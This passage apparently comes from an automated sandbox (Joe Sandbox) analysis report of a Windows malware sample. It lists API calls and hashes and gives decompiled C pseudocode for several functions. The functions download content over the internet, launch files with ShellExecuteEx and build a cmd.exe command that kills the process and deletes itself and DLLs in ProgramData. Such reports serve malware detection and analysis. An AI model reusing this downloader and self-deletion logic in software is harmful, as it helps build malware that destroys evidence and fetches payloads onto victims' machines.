                                                                    0x00408197
                                                                    0x0040819e
                                                                    0x004081bb
                                                                    0x004081bb
                                                                    0x004081c1
                                                                    0x004081c5
                                                                    0x004081cd
                                                                    0x004081cd
                                                                    0x004081d3
                                                                    0x00000000
                                                                    0x004081d3
                                                                    0x00408157
                                                                    0x00408179
                                                                    0x00408179
                                                                    0x00408180
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00408182
                                                                    0x00408184
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00408184
                                                                    0x0040816f
                                                                    0x00408175
                                                                    0x00408177
                                                                    0x004081f6
                                                                    0x00000000
                                                                    0x004081f6
                                                                    0x00000000
                                                                    0x00408177
                                                                    0x004081ea
                                                                    0x00000000
                                                                    0x004081ea
                                                                    0x004080a0
                                                                    0x00000000
                                                                    0x004080a0
                                                                    0x004080bf
                                                                    0x004080c6
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x004080c8
                                                                    0x004080cf
                                                                    0x00408052
                                                                    0x0040806d
                                                                    0x00000000
                                                                    0x00408073
                                                                    0x004080d1
                                                                    0x004080d8
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x004080d8
                                                                    0x0040804b
                                                                    0x00000000
                                                                    0x0040804b
                                                                    0x00408007
                                                                    0x00000000
                                                                    0x00408007
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000

                                                                    APIs
                                                                    • __fassign.LIBCMT ref: 0040803F
                                                                    • wsprintfA.USER32 ref: 0040806D
                                                                    • CreateFileA.KERNEL32(00000000,40000000,00000000,00000000,00000002,?,00000000), ref: 0040808F
                                                                    • wsprintfA.USER32 ref: 004080F2
                                                                    • WriteFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 0040816F
                                                                    • SetFileTime.KERNEL32(?,?,?,?), ref: 004081BB
                                                                    • CloseHandle.KERNEL32(?), ref: 004081CD
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.593774226.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_400000_cvtres.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: File$wsprintf$CloseCreateHandleTimeWrite__fassign
                                                                    • String ID: %s%s$%s%s%s$:$\
                                                                    • API String ID: 3651047468-1100577047
                                                                    • Opcode ID: d5ab2499192fcd582bce1979857674210668997074c52868ae46cfbfd23cd73f
                                                                    • Instruction ID: bafdb481dc1f29af2d9388862325addfc2d1c1539a519b4d1f2314e885e39751
                                                                    • Opcode Fuzzy Hash: d5ab2499192fcd582bce1979857674210668997074c52868ae46cfbfd23cd73f
                                                                    • Instruction Fuzzy Hash: 31A1A0319046189BDF259F24CD847EA77B8AF05314F0401FBE554BB2D1CB78AE89CB9A
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00408464 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 122stringCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 71%
                                                                    			E00408464(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* __ebp;
				signed int _t27;
				CHAR* _t31;
				short _t32;
				char* _t33;
				void* _t35;
				void* _t37;
				void* _t40;
				CHAR* _t55;
				char* _t58;
				void* _t61;
				void* _t62;
				void* _t71;
				void* _t72;
				char* _t74;
				void* _t75;
				intOrPtr _t78;
				void* _t79;
				intOrPtr _t80;
				CHAR* _t82;
				void* _t84;
				void* _t85;
				void* _t86;
				void* _t89;

				_t73 = __edi;
				_t72 = __edx;
				_t85 = _t84 - 0x3e8;
				_t82 = _t85 - 4;
				_t27 =  *0x443674; // 0x393162b1
				_t82[0x3e8] = _t27 ^ _t82;
				_push(0x44);
				E004207D5(E00433947, __ebx, __edi, __esi);
				_t78 = 1;
				 *((intOrPtr*)(_t82 - 4)) = 0;
				 *0x4465f0 = 1;
				_t62 = 0x3e8;
				_t31 = _t82;
				do {
					 *_t31 = 0;
					_t31 =  &(_t31[1]);
					_t62 = _t62 - 1;
				} while (_t62 != 0);
				_t32 = 0x3b;
				 *((short*)(_t82 - 0x10)) = _t32;
				_t33 = _t82[0x3f4];
				if(_t82[0x408] < 0x10) {
					_t33 =  &(_t82[0x3f4]);
				}
				_t74 = E0041E87C(0, _t72, _t73, _t33, _t82 - 0x10, _t82 - 0x14);
				_t86 = _t85 + 0xc;
				if(_t74 != 0) {
					_t80 = 0x3c;
					do {
						_t37 =  *0x446320(_t74);
						_t95 = _t37 - 5;
						if(_t37 > 5) {
							lstrcatA(_t82,  *0x445fe0);
							_t40 = 0x14;
							lstrcatA(_t82, E00415EF6(_t40, _t95));
							lstrcatA(_t82,  *0x445e3c);
							E0040D708(_t74, _t72);
							E00426300(_t82 - 0x50, 0, _t80);
							 *(_t82 - 0x40) = _t82;
							 *((intOrPtr*)(_t82 - 0x50)) = _t80;
							 *((intOrPtr*)(_t82 - 0x4c)) = 0;
							 *((intOrPtr*)(_t82 - 0x48)) = 0;
							 *(_t82 - 0x44) = "open";
							 *((intOrPtr*)(_t82 - 0x3c)) = 0x43c8d8;
							 *((intOrPtr*)(_t82 - 0x38)) = 0;
							 *((intOrPtr*)(_t82 - 0x34)) = 5;
							 *((intOrPtr*)(_t82 - 0x30)) = 0;
							 *0x44648c(_t82 - 0x50, _t82);
							E00426300(_t82 - 0x50, 0, _t80);
							_t89 = _t86 + 0x1c;
							_t71 = 0x3e8;
							_t55 = _t82;
							do {
								 *_t55 = 0;
								_t55 =  &(_t55[1]);
								_t71 = _t71 - 1;
							} while (_t71 != 0);
							_t58 = E0041E87C(0, _t72, _t74, 0, _t82 - 0x10, _t82 - 0x14);
							_t86 = _t89 + 0xc;
							_t74 = _t58;
						}
					} while (_t74 != 0);
					_t78 = 1;
				}
				 *0x4465f8 = _t78;
				_t35 = E00404354( &(_t82[0x3f4]), _t78, 0);
				 *[fs:0x0] =  *((intOrPtr*)(_t82 - 0xc));
				_pop(_t75);
				_pop(_t79);
				_pop(_t61);
				return E0041DA9B(_t35, _t61, _t82[0x3e8] ^ _t82, _t72, _t75, _t79);
			}



























                                                                    0x00408464
                                                                    0x00408464
                                                                    0x00408465
                                                                    0x0040846b
                                                                    0x0040846f
                                                                    0x00408476
                                                                    0x0040847c
                                                                    0x00408483
                                                                    0x0040848c
                                                                    0x0040848d
                                                                    0x00408490
                                                                    0x00408496
                                                                    0x0040849b
                                                                    0x0040849e
                                                                    0x0040849e
                                                                    0x004084a0
                                                                    0x004084a1
                                                                    0x004084a1
                                                                    0x004084ad
                                                                    0x004084ae
                                                                    0x004084b2
                                                                    0x004084b8
                                                                    0x004084ba
                                                                    0x004084ba
                                                                    0x004084ce
                                                                    0x004084d0
                                                                    0x004084d5
                                                                    0x004084dd
                                                                    0x004084de
                                                                    0x004084df
                                                                    0x004084e5
                                                                    0x004084e8
                                                                    0x004084f8
                                                                    0x00408500
                                                                    0x0040850b
                                                                    0x0040851b
                                                                    0x00408527
                                                                    0x00408532
                                                                    0x0040853a
                                                                    0x00408544
                                                                    0x00408547
                                                                    0x0040854a
                                                                    0x0040854d
                                                                    0x00408554
                                                                    0x0040855b
                                                                    0x0040855e
                                                                    0x00408565
                                                                    0x00408568
                                                                    0x00408574
                                                                    0x00408579
                                                                    0x0040857c
                                                                    0x00408581
                                                                    0x00408584
                                                                    0x00408584
                                                                    0x00408586
                                                                    0x00408587
                                                                    0x00408587
                                                                    0x00408593
                                                                    0x00408598
                                                                    0x0040859b
                                                                    0x0040859b
                                                                    0x0040859d
                                                                    0x004085a7
                                                                    0x004085a7
                                                                    0x004085b0
                                                                    0x004085b6
                                                                    0x004085be
                                                                    0x004085c6
                                                                    0x004085c7
                                                                    0x004085c8
                                                                    0x004085dd

                                                                    APIs
                                                                    • __EH_prolog3.LIBCMT ref: 00408483
                                                                    • _strtok_s.LIBCMT ref: 004084C9
                                                                    • lstrlen.KERNEL32(00000000,?,?,00000044), ref: 004084DF
                                                                    • lstrcatA.KERNEL32(00000000,?,?,00000044), ref: 004084F8
                                                                    • lstrcatA.KERNEL32(00000000,00000000,?,?,00000044), ref: 0040850B
                                                                    • lstrcatA.KERNEL32(00000000,?,?,00000044), ref: 0040851B
                                                                    • _memset.LIBCMT ref: 00408532
                                                                    • ShellExecuteEx.SHELL32(?), ref: 00408568
                                                                    • _memset.LIBCMT ref: 00408574
                                                                    • _strtok_s.LIBCMT ref: 00408593
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.593774226.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_400000_cvtres.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: lstrcat$_memset_strtok_s$ExecuteH_prolog3Shelllstrlen
                                                                    • String ID: open
                                                                    • API String ID: 918602802-2758837156
                                                                    • Opcode ID: 3d5ef9c5d50f0dd0700dd2f7db8955548b2b3cb180e2b399da2dfe38f5dd0dc2
                                                                    • Instruction ID: d56ce09891c1524cae434c557d9be1ba18f910f8940cc535b8fdc1bba9f7232f
                                                                    • Opcode Fuzzy Hash: 3d5ef9c5d50f0dd0700dd2f7db8955548b2b3cb180e2b399da2dfe38f5dd0dc2
                                                                    • Instruction Fuzzy Hash: 4E416CB6900259ABDF15DF91DC84AEE77BCFB09314F40043EE909E7280EB3896498B59
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 004164A1 Relevance: 19.4, APIs: 5, Strings: 6, Instructions: 118COMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 81%
                                                                    			E004164A1(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* __ebp;
				signed int _t38;
				void* _t43;
				void* _t45;
				void* _t47;
				void* _t49;
				void* _t51;
				void* _t53;
				intOrPtr _t64;
				void* _t67;
				void* _t73;
				void* _t74;
				void* _t87;
				intOrPtr _t91;
				void* _t92;
				void* _t96;
				signed int _t97;
				void* _t99;

				_t87 = __edx;
				_t97 = _t99 - 0xc0;
				_t38 =  *0x443674; // 0x393162b1
				 *(_t97 + 0xc4) = _t38 ^ _t97;
				E004207D5(E004340B8, __ebx, __edi, __esi);
				_t43 = E00416233(_t97 + 0x1c, GetCurrentProcessId());
				_t74 = 0x3c;
				 *((intOrPtr*)(_t97 - 4)) = 0;
				_push(GetCurrentProcessId());
				_t45 = E004163DF(_t97 + 0x54);
				 *((char*)(_t97 - 4)) = 1;
				_t47 = E00404697(_t74, _t97 + 0x70, "/c taskkill /im ", _t45);
				 *((char*)(_t97 - 4)) = 2;
				_t49 = E0040C20F(_t74, _t97 + 0x8c, _t47, " /f & timeout /t 6 & del /f /q \"");
				 *((char*)(_t97 - 4)) = 3;
				_t51 = E004046CE(_t43, _t97);
				 *((char*)(_t97 - 4)) = 4;
				_t53 = E0040C20F(_t49, _t97 + 0x38, _t51, "\" & del C:\\ProgramData\\*.dll");
				 *((char*)(_t97 - 4)) = 5;
				E0040C20F(_t49, _t97 + 0xa8, _t53, " & exit");
				E00404354(_t97 + 0x38, 1, 0);
				E00404354(_t97, 1, 0);
				E00404354(_t97 + 0x8c, 1, 0);
				E00404354(_t97 + 0x70, 1, 0);
				E00404354(_t97 + 0x54, 1, 0);
				 *((char*)(_t97 - 4)) = 0xc;
				E00404354(_t97 + 0x1c, 1, 0);
				_t91 = 0x3c;
				E00426300(_t97 - 0x48, 0, _t91);
				_t64 =  *((intOrPtr*)(_t97 + 0xa8));
				 *((intOrPtr*)(_t97 - 0x48)) = _t91;
				 *((intOrPtr*)(_t97 - 0x44)) = 0;
				 *((intOrPtr*)(_t97 - 0x40)) = 0;
				 *(_t97 - 0x3c) = "open";
				 *(_t97 - 0x38) = "C:\\Windows\\System32\\cmd.exe";
				if( *((intOrPtr*)(_t97 + 0xbc)) < 0x10) {
					_t64 = _t97 + 0xa8;
				}
				 *((intOrPtr*)(_t97 - 0x34)) = _t64;
				 *((intOrPtr*)(_t97 - 0x30)) = 0;
				 *((intOrPtr*)(_t97 - 0x2c)) = 0;
				 *((intOrPtr*)(_t97 - 0x28)) = 0;
				 *0x44648c(_t97 - 0x48);
				_t67 = E00404354(_t97 + 0xa8, 1, 0);
				 *[fs:0x0] =  *((intOrPtr*)(_t97 - 0xc));
				_pop(_t92);
				_pop(_t96);
				_pop(_t73);
				return E0041DA9B(_t67, _t73,  *(_t97 + 0xc4) ^ _t97, _t87, _t92, _t96);
			}





















                                                                    0x004164a1
                                                                    0x004164a8
                                                                    0x004164ac
                                                                    0x004164b3
                                                                    0x004164c0
                                                                    0x004164cf
                                                                    0x004164d4
                                                                    0x004164d9
                                                                    0x004164e2
                                                                    0x004164e6
                                                                    0x004164f8
                                                                    0x004164fb
                                                                    0x0041650d
                                                                    0x00416511
                                                                    0x0041651d
                                                                    0x00416521
                                                                    0x00416530
                                                                    0x00416534
                                                                    0x00416546
                                                                    0x0041654a
                                                                    0x00416557
                                                                    0x00416560
                                                                    0x0041656d
                                                                    0x00416577
                                                                    0x00416581
                                                                    0x00416587
                                                                    0x0041658f
                                                                    0x00416596
                                                                    0x0041659d
                                                                    0x004165a2
                                                                    0x004165b2
                                                                    0x004165b5
                                                                    0x004165b8
                                                                    0x004165bb
                                                                    0x004165c2
                                                                    0x004165c9
                                                                    0x004165cb
                                                                    0x004165cb
                                                                    0x004165d1
                                                                    0x004165d8
                                                                    0x004165db
                                                                    0x004165de
                                                                    0x004165e1
                                                                    0x004165ef
                                                                    0x004165f7
                                                                    0x004165ff
                                                                    0x00416600
                                                                    0x00416601
                                                                    0x00416616

                                                                    APIs
                                                                    • __EH_prolog3.LIBCMT ref: 004164C0
                                                                    • GetCurrentProcessId.KERNEL32(0000003C), ref: 004164C5
                                                                      • Part of subcall function 00416233: OpenProcess.KERNEL32(00000410,00000000,0040B15A,00000000,00000001), ref: 0041625A
                                                                      • Part of subcall function 00416233: GetModuleFileNameExA.PSAPI(00000000,00000000,?,00000104), ref: 00416274
                                                                      • Part of subcall function 00416233: CloseHandle.KERNEL32(00000000), ref: 0041627B
                                                                    • GetCurrentProcessId.KERNEL32 ref: 004164DC
                                                                      • Part of subcall function 004163DF: _memset.LIBCMT ref: 00416420
                                                                      • Part of subcall function 004163DF: OpenProcess.KERNEL32(00000410,00000000,?,?,00000000,00000000), ref: 00416432
                                                                      • Part of subcall function 004163DF: EnumProcessModules.PSAPI(00000000,?,00000004,?,?,00000000,00000000), ref: 00416449
                                                                      • Part of subcall function 004163DF: GetModuleBaseNameA.PSAPI(00000000,?,?,00000104,?,00000000,00000000), ref: 00416460
                                                                      • Part of subcall function 004163DF: CloseHandle.KERNEL32(00000000,?,00000000,00000000), ref: 00416467
                                                                      • Part of subcall function 00404354: _memmove.LIBCMT ref: 00404373
                                                                    • _memset.LIBCMT ref: 0041659D
                                                                    • ShellExecuteEx.SHELL32(?), ref: 004165E1
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.593774226.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_400000_cvtres.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Process$CloseCurrentHandleModuleNameOpen_memset$BaseEnumExecuteFileH_prolog3ModulesShell_memmove
                                                                    • String ID: & exit$ /f & timeout /t 6 & del /f /q "$" & del C:\ProgramData\*.dll$/c taskkill /im $C:\Windows\System32\cmd.exe$open
                                                                    • API String ID: 1885640224-2169176781
                                                                    • Opcode ID: 57fc7d6f66a865e5756a830063db229e5885611e16897983d06949847bbf6275
                                                                    • Instruction ID: 9c3fa8660bc09bfe6a6b27ce70cf6555235a06a634c8491fb7bd894cd3fe12af
                                                                    • Opcode Fuzzy Hash: 57fc7d6f66a865e5756a830063db229e5885611e16897983d06949847bbf6275
                                                                    • Instruction Fuzzy Hash: 3B4184B2900258EBDB25EF99DC85FCE7BACAF55304F10402FF916A3181DB785648CB69
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00409404 Relevance: 18.1, APIs: 12, Instructions: 114COMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 72%
                                                                    			E00409404(CHAR* __ecx, void* __edx, long _a4) {
				signed int _v12;
				struct _GENERIC_MAPPING _v28;
				struct _PRIVILEGE_SET _v48;
				long _v52;
				void* _v56;
				void* _v60;
				int _v64;
				long _v68;
				long _v72;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t37;
				signed char _t65;
				void* _t71;
				CHAR* _t72;
				struct _SECURITY_DESCRIPTOR* _t74;
				signed int _t75;

				_t71 = __edx;
				_t37 =  *0x443674; // 0x393162b1
				_v12 = _t37 ^ _t75;
				_t65 = 0;
				_t72 = __ecx;
				_v52 = 0;
				if(GetFileSecurityA(__ecx, 7, 0, 0,  &_v52) == 0 && GetLastError() == 0x7a) {
					_t74 = E0041DAE4(_t71, _t72, _t74, _v52);
					if(_t74 != 0 && GetFileSecurityA(_t72, 7, _t74, _v52,  &_v52) != 0) {
						_v56 = 0;
						if(OpenProcessToken(GetCurrentProcess(), 0x2000e,  &_v56) != 0) {
							_v60 = 0;
							if(DuplicateToken(_v56, 2,  &_v60) != 0) {
								asm("stosd");
								asm("stosd");
								asm("stosd");
								_v48.PrivilegeCount = 0;
								_t72 =  &(_v48.Control);
								asm("stosd");
								asm("stosd");
								asm("stosd");
								asm("stosd");
								_v68 = 0;
								_v72 = 0x14;
								_v64 = 0;
								_v28.GenericRead = 0x120089;
								_v28.GenericWrite = 0x120116;
								_v28.GenericExecute = 0x1200a0;
								_v28.GenericAll = 0x1f01ff;
								MapGenericMask( &_a4,  &_v28);
								if(AccessCheck(_t74, _v60, _a4,  &_v28,  &_v48,  &_v72,  &_v68,  &_v64) != 0) {
									_t65 = 0 | _v64 == 0x00000001;
								}
								CloseHandle(_v60);
							}
							CloseHandle(_v56);
						}
						E0041DAAA(_t74);
					}
				}
				return E0041DA9B(_t65 & 0x000000ff, _t65, _v12 ^ _t75, _t71, _t72, _t74);
			}





















                                                                    0x00409404
                                                                    0x0040940a
                                                                    0x00409411
                                                                    0x0040941b
                                                                    0x0040941f
                                                                    0x00409424
                                                                    0x0040942f
                                                                    0x0040944c
                                                                    0x00409451
                                                                    0x00409479
                                                                    0x0040948b
                                                                    0x0040949a
                                                                    0x004094a5
                                                                    0x004094b0
                                                                    0x004094b1
                                                                    0x004094b2
                                                                    0x004094b5
                                                                    0x004094b8
                                                                    0x004094bb
                                                                    0x004094bc
                                                                    0x004094bd
                                                                    0x004094be
                                                                    0x004094c7
                                                                    0x004094ca
                                                                    0x004094d1
                                                                    0x004094d4
                                                                    0x004094db
                                                                    0x004094e2
                                                                    0x004094e9
                                                                    0x004094f0
                                                                    0x00409519
                                                                    0x0040951f
                                                                    0x0040951f
                                                                    0x00409525
                                                                    0x00409525
                                                                    0x0040952e
                                                                    0x0040952e
                                                                    0x00409535
                                                                    0x0040953a
                                                                    0x00409451
                                                                    0x0040954c

                                                                    APIs
                                                                    • GetFileSecurityA.ADVAPI32(?,00000007,00000000,00000000,?), ref: 00409427
                                                                    • GetLastError.KERNEL32(?,00000007,00000000,00000000,?), ref: 00409435
                                                                    • _malloc.LIBCMT ref: 00409447
                                                                      • Part of subcall function 0041DAE4: __FF_MSGBANNER.LIBCMT ref: 0041DAFD
                                                                      • Part of subcall function 0041DAE4: __NMSG_WRITE.LIBCMT ref: 0041DB04
                                                                      • Part of subcall function 0041DAE4: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,00403F3E,00000010), ref: 0041DB29
                                                                    • GetFileSecurityA.ADVAPI32(?,00000007,00000000,?,?), ref: 00409462
                                                                    • GetCurrentProcess.KERNEL32(0002000E,?,?,00000007,00000000,?,?,?,00000007,00000000,00000000,?), ref: 0040947C
                                                                    • OpenProcessToken.ADVAPI32(00000000,?,00000007,00000000,?,?,?,00000007,00000000,00000000,?), ref: 00409483
                                                                    • DuplicateToken.ADVAPI32(?,00000002,?,?,00000007,00000000,?,?,?,00000007,00000000,00000000,?), ref: 0040949D
                                                                    • MapGenericMask.ADVAPI32(?,?,?,00000007,00000000,?,?,?,00000007,00000000,00000000,?), ref: 004094F0
                                                                    • AccessCheck.ADVAPI32(00000000,?,?,00120089,?,00000014,?,?,?,00000007,00000000,?,?,?,00000007,00000000), ref: 00409511
                                                                    • CloseHandle.KERNEL32(?,?,00000007,00000000,?,?,?,00000007,00000000,00000000,?), ref: 00409525
                                                                    • CloseHandle.KERNEL32(?,?,00000007,00000000,?,?,?,00000007,00000000,00000000,?), ref: 0040952E
                                                                    • _free.LIBCMT ref: 00409535
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.593774226.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_400000_cvtres.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CloseFileHandleProcessSecurityToken$AccessAllocateCheckCurrentDuplicateErrorGenericHeapLastMaskOpen_free_malloc
                                                                    • String ID:
                                                                    • API String ID: 1304225167-0
                                                                    • Opcode ID: 5000e1eb01f3d1369351d1f19aafc8d8fa967190e9d6bcc6a5afd883dac0db86
                                                                    • Instruction ID: cd591ed8071c4faaeab0ff4fdcbcbc3ab9b1806a47f59e6685ff706f4dc3d821
                                                                    • Opcode Fuzzy Hash: 5000e1eb01f3d1369351d1f19aafc8d8fa967190e9d6bcc6a5afd883dac0db86
                                                                    • Instruction Fuzzy Hash: 6641F776900218BFDF11DFE5ED849EEBBB8BF09340F45413AF601E2161DB749A448B65
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0040DE3A Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 91networkmemoryfileCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 50%
                                                                    			E0040DE3A(char* __ecx, void* __eflags) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t23;
				void* _t36;
				char* _t42;
				void* _t43;
				void* _t44;
				void* _t54;
				void* _t55;
				void* _t56;
				void* _t59;
				signed int _t60;
				void* _t62;

				_t60 = _t62 - 0x398;
				_t23 =  *0x443674; // 0x393162b1
				 *(_t60 + 0x394) = _t23 ^ _t60;
				_t42 = __ecx;
				_push("https");
				 *(_t60 - 0x70) = 1;
				 *((intOrPtr*)(_t60 - 0x78)) = 0;
				_push(E0040D694(__ecx, 1, 0));
				if( *0x446458() == 0) {
					 *((intOrPtr*)(_t60 - 0x78)) = 1;
				}
				 *((intOrPtr*)(_t60 - 0x74)) = HeapAlloc(GetProcessHeap(), 0, 0x5f5e0ff);
				_t54 = InternetOpenA(0x43c8d8, 0, 0, 0, 0);
				 *(_t60 - 0x7c) = _t54;
				 *(_t60 - 0x80) = 0x927c0;
				InternetSetOptionA(_t54, 2, _t60 - 0x80, 4);
				_push(0);
				if( *((intOrPtr*)(_t60 - 0x78)) == 0) {
					_push(0x4000100);
				} else {
					_push(0x4800100);
				}
				_t43 = InternetOpenUrlA(_t54, _t42, 0, 0, ??, ??);
				_t55 = 0;
				while( *(_t60 - 0x70) > 0) {
					InternetReadFile(_t43, _t60 - 0x6c, 0x400, _t60 - 0x70);
					_t36 = 0;
					if( *(_t60 - 0x70) > 0) {
						do {
							 *((char*)(_t55 +  *((intOrPtr*)(_t60 - 0x74)))) =  *((intOrPtr*)(_t60 + _t36 - 0x6c));
							_t55 = _t55 + 1;
							_t36 = _t36 + 1;
						} while (_t36 <  *(_t60 - 0x70));
						continue;
					}
					break;
				}
				InternetCloseHandle(_t43);
				InternetCloseHandle( *(_t60 - 0x7c));
				_pop(_t56);
				_pop(_t59);
				_pop(_t44);
				return E0041DA9B( *((intOrPtr*)(_t60 - 0x74)), _t44,  *(_t60 + 0x394) ^ _t60, _t55, _t56, _t59);
			}

















                                                                    0x0040de3b
                                                                    0x0040de48
                                                                    0x0040de4f
                                                                    0x0040de5d
                                                                    0x0040de5f
                                                                    0x0040de64
                                                                    0x0040de67
                                                                    0x0040de6f
                                                                    0x0040de78
                                                                    0x0040de7a
                                                                    0x0040de7a
                                                                    0x0040de99
                                                                    0x0040dea2
                                                                    0x0040dead
                                                                    0x0040deb0
                                                                    0x0040deb7
                                                                    0x0040debd
                                                                    0x0040dec1
                                                                    0x0040deca
                                                                    0x0040dec3
                                                                    0x0040dec3
                                                                    0x0040dec3
                                                                    0x0040ded9
                                                                    0x0040dedb
                                                                    0x0040df0b
                                                                    0x0040deed
                                                                    0x0040def3
                                                                    0x0040def8
                                                                    0x0040defa
                                                                    0x0040df01
                                                                    0x0040df04
                                                                    0x0040df05
                                                                    0x0040df06
                                                                    0x00000000
                                                                    0x0040defa
                                                                    0x00000000
                                                                    0x0040def8
                                                                    0x0040df11
                                                                    0x0040df1a
                                                                    0x0040df2b
                                                                    0x0040df2c
                                                                    0x0040df2f
                                                                    0x0040df3c

                                                                    APIs
                                                                      • Part of subcall function 0040D694: _memset.LIBCMT ref: 0040D6AF
                                                                      • Part of subcall function 0040D694: _memset.LIBCMT ref: 0040D6BC
                                                                      • Part of subcall function 0040D694: lstrlen.KERNEL32(00000000,10000000,?), ref: 0040D6E2
                                                                      • Part of subcall function 0040D694: InternetCrackUrlA.WININET(00000000,00000000), ref: 0040D6EA
                                                                    • StrCmpCA.SHLWAPI(00000000,https,004442DC,?,00000000), ref: 0040DE70
                                                                    • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0040DE83
                                                                    • HeapAlloc.KERNEL32(00000000), ref: 0040DE8A
                                                                    • InternetOpenA.WININET(0043C8D8,00000000,00000000,00000000,00000000), ref: 0040DE9C
                                                                    • InternetSetOptionA.WININET(00000000,00000002,?,00000004), ref: 0040DEB7
                                                                    • InternetOpenUrlA.WININET(00000000,?,00000000,00000000,04000100,00000000), ref: 0040DED3
                                                                    • InternetReadFile.WININET(00000000,?,00000400,?), ref: 0040DEED
                                                                    • InternetCloseHandle.WININET(00000000), ref: 0040DF11
                                                                    • InternetCloseHandle.WININET(?), ref: 0040DF1A
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.593774226.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_400000_cvtres.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Internet$CloseHandleHeapOpen_memset$AllocCrackFileOptionProcessReadlstrlen
                                                                    • String ID: https
                                                                    • API String ID: 73800822-1056335270
                                                                    • Opcode ID: 1d0c6895805592d6e6583423363ed62a85c2b5370f0b85be95688998276abe5f
                                                                    • Instruction ID: d08c8a8476cafad2ce87738ccbbde315399448c613f2ae02c633d8655c59d400
                                                                    • Opcode Fuzzy Hash: 1d0c6895805592d6e6583423363ed62a85c2b5370f0b85be95688998276abe5f
                                                                    • Instruction Fuzzy Hash: D3317075900218ABDB219FB19C499AFBBBCFF4B711F20042AF515A7241CB7449058BA9
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0041BDB5 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 170fileCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 95%
                                                                    			E0041BDB5(void* __ecx, signed int __edx, signed short* _a4, long* _a8, signed int* _a12) {
				signed int _v8;
				intOrPtr _v36;
				intOrPtr _v44;
				intOrPtr _v52;
				struct _BY_HANDLE_FILE_INFORMATION _v60;
				signed short _v64;
				void _v68;
				long _v72;
				long _v76;
				void _v80;
				long* _v84;
				signed int* _v88;
				signed short* _v92;
				void _v96;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t75;
				signed int _t85;
				long _t86;
				signed short* _t87;
				long* _t88;
				void* _t89;
				long _t107;
				void _t112;
				signed int* _t113;
				signed char _t115;
				signed int _t124;
				signed int _t127;

				_t124 = __edx;
				_t75 =  *0x443674; // 0x393162b1
				_v8 = _t75 ^ _t127;
				_v92 = _a4;
				_v84 = _a8;
				_v88 = _a12;
				_t126 = __ecx;
				_t113 = __edx;
				if(GetFileInformationByHandle(__ecx,  &_v60) != 0) {
					_t115 = _v60.dwFileAttributes;
					_t125 = 0;
					_v68 = _t115;
					_t11 =  &_v68;
					 *_t11 = _v68 & 1;
					_v64 = 0;
					if( *_t11 != 0) {
						_v64 = 1;
					}
					if((_t115 & 0x00000002) != 0) {
						_v64 = _v64 | 0x00000002;
					}
					if((_t115 & 0x00000004) != 0) {
						_v64 = _v64 | 0x00000004;
					}
					_t85 = _t115 & 0x00000010;
					if(_t85 != 0) {
						_v64 = _v64 | 0x00000010;
					}
					if((_t115 & 0x00000020) != 0) {
						_v64 = _v64 | 0x00000020;
					}
					if(_t85 == _t125) {
						_v64 = _v64 | 0x80000000;
					} else {
						_v64 = _v64 | 0x40000000;
					}
					_v64 = _v64 | 0x01000000;
					if(_v68 == _t125) {
						_v64 = _v64 | 0x00800000;
					}
					_t86 = GetFileSize(_t126, _t125);
					_v76 = _t86;
					if(_t86 > 0x28) {
						SetFilePointer(_t126, _t125, _t125, _t125);
						ReadFile(_t126,  &_v68, 2,  &_v72, _t125);
						SetFilePointer(_t126, 0x24, _t125, _t125);
						ReadFile(_t126,  &_v80, 4,  &_v72, _t125);
						if(_v68 == 0x54ad) {
							_t107 = _v80;
							if(_v76 > _t107 + 0x34) {
								SetFilePointer(_t126, _t107, _t125, _t125);
